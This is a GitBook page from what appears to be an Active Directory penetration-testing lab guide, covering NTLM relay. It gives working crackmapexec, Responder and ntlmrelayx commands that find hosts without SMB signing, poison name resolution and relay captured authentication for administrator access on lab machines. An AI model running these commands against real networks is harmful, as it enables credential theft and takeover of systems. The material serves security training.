Attacking Active Directory
  • Reconnaissance
    • Enumerate Network
    • Enumerating Users With CME - Anonymously
    • Enumerate Users Anonymously - RPC
    • Enumerating User with Ldapsearch and enum4linux - Anonymously
    • Enumerate Guest Access on Shares - CME
  • Exploiting With Poison and Relay
    • Responder
    • NTLM relay
    • Secretsdump
    • Lsassy
    • DonPapi
    • Pass The Hash with Winpexec.py
    • Pass The Hash with Evil-Winrm
    • Pass the Hash with CrackMapExec
    • Coerced auth smb + ntlmrelayx to ldaps with drop the mic
  • User Enumeration Exploit
    • setup /etc/hosts and kerberos
    • Exploiting Username - ASREPRoast
    • Password Spraying
    • User listing with GetADUsers and ldapsearch
    • Kerberoasting
    • Powerview
      • Setting Up PowerView
      • Get-NetUser
      • Get-NetGroup
      • Get-NetComputer
      • Get-NetFileServer
      • Get-NetGPO
      • Get-ObjectAcl
      • Get-NetDomainTrust
      • Invoke-Portscan
    • Enumerate Shares with User Account
  • Exploiting with Users
    • SamAccountName (NoPac)
      • Semi Manual Exploit
      • From Linux With NoPAC.py
      • From Windows With noPAC.exe
    • PrintNightmare - Bronx
      • Check and Prepare
      • windows and linux
    • PrintNightmare - Baltimore
      • Exploit
  • WSUS Exploit
  • Active Directory Certificate Services (ADCS)
    • Bloodhound
      • Bloodhound - Install Neo4j
      • Run BloodHound
      • ADCS reconnaissance and enumeration (with certipy and bloodhound)
    • ESC8 - coerce to domain admin
    • ESC8 - with certipy
    • ADCS - ESC1
    • ADCS - ESC2 & ESC3
    • ADCS - ESC4
    • ADCS - ESC6
    • Certifried - CVE-2022–26923
    • Shadow Credentials
  • Metasploit
    • Initial Shell Shell Shell
    • Enumeration 1 - Users, Groups, Computers
    • Enumeration 2 - Arp, Tokens, Patches
    • Enumeration 3 - Shares, SMB, and More
    • Back Door Add User
    • Metasploit Exploit Suggester
    • HashDump With Metasploit
    • Lateral Movement With Metasploit
    • DsSync With Metasploit from NT Autority/System to Administrator
    • Golden Ticket with Metasploit
    • Using a Keylogger with Metasploit
    • BackDoor Meterpreter Service
  • Privilege Escalation
  • User ACL Exploits
    • Hunting with bloodhound
    • ACL With BloodHound
    • ForceChangePassword on User (Donald-> Hugo)
    • GenericWrite on User (Hugo -> Ramon)
    • WriteDacl on User (Ramon-> Nicolas)
    • Add self on Group (Nicolas-> RadioCity)
    • AddMember on Group (RadioCity -> EmpireState)
    • WriteOwner on Group (EmpireState -> CentralPark)
    • Generic all on user (CentralPark -> diego.Montenegro)
      • machine account to administrator shell
      • Silver ticket
    • GPO abuse
    • Read Laps password
  • MSSQL servers Exploitation
    • Enumerate the MSSQL servers
    • Enumerate MSSQL servers with GetUserSPNs & NMAP
    • Enumerate MSSQL servers with CrackMap & Impacket
    • impersonate - execute as login
    • MSSQL Coerce and relay
    • MSSQL trusted links
    • MSSQL Command execution to shell - Yonkers
    • MSSQL Command execution to shell - Salisbury
  • Delegations
    • Unconstrain
    • Constrain Delegation
      • With Protocol Transmition
      • Without protocol transition
    • Resource Based Constrained Delegation
    • Unconstrained delegation Enum
  • Trust
    • Enumerate Trust
    • Domain Trust - child/parent (north.newyork.local -> newyork.local)
      • RaiseMeUp - Escalate with impacket raiseChild
      • Golden ticket + ExtraSid
      • Trust ticket - forge inter-realm TGT
    • Forest Trust (newyork.local -> maryland.local)
      • Foreign group and users
      • Use unconstrained delegation
      • Mssql Trusted link
      • Golden ticket with external forest, sid history ftw ( Maryland-> NewYork)
      • Trust ticket with external forest ( maryland.local-> newyork.local)
      • Exploit acl with external trust golden ticket
  • Exploiting IIS & Privilege escalation
    • IIS - webshell
    • Privesc SeImpersonatePrivilege
    • winPeas without touching disk
    • SeImpersonatePrivilege to Authority\system
    • KrbRelay Up - Linux
    • KrbRelay Up - Windows - PowerPack
    • KrbRelay Up - Windows V2
  • Impacket
    • Install Impacket
    • Getting Initial Shell
Powered by GitBook
On this page
  • Unsigned SMB
  • responder + ntlmrelayx to smb
  1. Exploiting With Poison and Relay

NTLM relay

PreviousResponderNextSecretsdump

Last updated 2 years ago

Unsigned SMB

Let’s start hunting unsigned smb in the lab and generate a list of IP targets.

SMB signing is a security mechanism in the SMB protocol. When SMB signing is enabled, each SMB message is sent with a signature in the SMB header field. The signature consists of the contents of the SMB message, encrypted with the AES algorithm. This allows the recipient of the SMB message to verify that the content of the message has been changed. It also verifies the identity of the sender. If the content of the message doesn’t match the SMB header, the recipient knows that the message has been tampered with. The recipient then does nothing with this SMB message. This makes it impossible to successfully perform an NTLM relay attack.

cme smb 192.168.56.10-23 --gen-relay-list relay.txt

Now we got a list of signing:False smb computers, we can start to try to relay ntlm authentication to them.

responder + ntlmrelayx to smb

Before starting responder to poison the answer to LLMNR, MDNS and NBT-NS request we must stop the responder smb and http server as we don’t want to get the hashes directly but we want to relay them to ntlmrelayx.

sed -i 's/HTTP = On/HTTP = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP ='
sed -i 's/SMB = On/SMB = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB ='

Next, we start ntlmrelayx

ntlmrelayx -tf smb_targets.txt -of netntlm -smb2support -socks
-tf : list of targets to relay the authentication
-of : output file, this will keep the captured smb hashes just like we did before with responder, to crack them later
-smb2support : support for smb2
-socks : will start a socks proxy to use relayed authentication

The program send back this error :

let’s fix it :

Type help for list of commands
    self._target(*self._args, **self._kwargs)
  File "/usr/local/lib/python3.10/dist-packages/impacket/examples/ntlmrelayx/servers/socksserver.py", line 247, in webService
    from flask import Flask, jsonify
  File "/usr/local/lib/python3.10/dist-packages/flask/__init__.py", line 19, in <module>
    from jinja2 import Markup, escape
ImportError: cannot import name 'Markup' from 'jinja2' (/usr/local/lib/python3.10/dist-packages/jinja2/__init__.py)

let’s fix it :

pip3 install Flask Jinja2 --upgrade

Relaunch ntlmrelayx, fine it work :)

ntlmrelayx -tf smb_targets.txt -of netntlm -smb2support -socks

Start responder to redirect queries to the relay server

responder -I vboxnet0

  • The poisoned connections are relayed to Yonkers (192.168.56.22) and maryland.local (192.168.56.23) and a socks proxy is setup to use the connection.

  • As fernando.alonzo is a domain administrator of north.newyork.local he got administrator privileges on Yonkers.

Now we can use this relay to get an access to the computer as an administrator

https://infosecwriteups.com/abusing-ntlm-relay-and-pass-the-hash-for-admin-d24d0f12bea0